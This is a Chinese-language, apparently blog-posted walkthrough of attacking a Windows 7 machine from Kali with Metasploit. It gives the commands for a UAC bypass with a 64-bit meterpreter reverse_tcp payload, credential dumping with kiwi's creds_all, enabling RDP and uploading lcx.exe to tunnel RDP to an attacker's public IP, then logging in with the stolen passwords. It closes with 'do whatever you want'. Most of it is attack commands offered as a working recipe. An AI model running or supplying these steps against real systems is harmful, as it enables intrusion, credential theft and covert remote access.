A.环境准备:
攻击机:kali2025
目标机:windows7 企业版
B.绕过方法:
1. 在MSF拿到目标机的shell之后,用getuid查看当前会话权限,尝试用getsystem提升权限,
但是MSF内置的提权工具都没有用,目标机存在UAC,也就是用户账户控制。
代码列表:
getuid
getsystem
2.先background把会话放在后台,查看会话列表,记住ID,再加载bypassuac,设置必要的参数,
代码列表:
background
sessions -l
use exploit/windows/local/bypassuac
show options
3.!!!注意!!!bypassuac默认的payload是32位的,而我的meterpreter会话是64位的,并且为
避免和之前的会话端口冲突,需外设payload和lport
代码列表:
set payload windows/x64/meterpreter/reverse_tcp
set SESSION 5 //ID设为你当前的会话ID,不必和我一样
set lport 4445
run
4.但发现报错了,说和我的64位的payload不兼容,不应该,目标机就是64位的,kill了会话,
重新监听还是不行,大退,重新连接之后,getuid发现是SYSTEM权限了
5.经过复盘后发现,在设置bypassuac参数时,忘记设target值了,
他默认是32位的,而目标机是64位的,
并确保payload也是64位的。
记得把target的值设置为与目标机架构相同的位数
set target 1
C.内网渗透:
1. 获取到SYSTEM权限后,抓取目标机上的账号密码
代码列表:
Load kiwi
creds_all
2.ipconfig查看目标机的网络环境,发现存在10.10.10.10/24网段的内网
3.用lcx做端口转发,远程打开远程桌面服务,可以用lcx的条件是目标机处于内网环境,
但是又可以连上外网。
代码列表:
upload /home/kali/lcx.exe C:/ //传lcx到目标机的C盘
background
use post/windows/manage/enable_rdp
show options
set SESSION 1
run
4.打开目标机的远程桌面后,再回到meterpreter会话,开始端口转发
代码列表:
sessions -i 1
shell
.\lcx.exe -slave <在监听的公网IP> 44441 127.0.0.1 3389
5.我在我windows上监听
.\lcx.exe-listen 44441 12345 //将44441端口流量转发到12345端口上
6.打开远程桌面连接,输入IP地址端口号
127.0.0.1:12345
7. 连接成功,输入收集的账号密码
8.成功登录,想干啥就干啥
浙公网安备 33010602011771号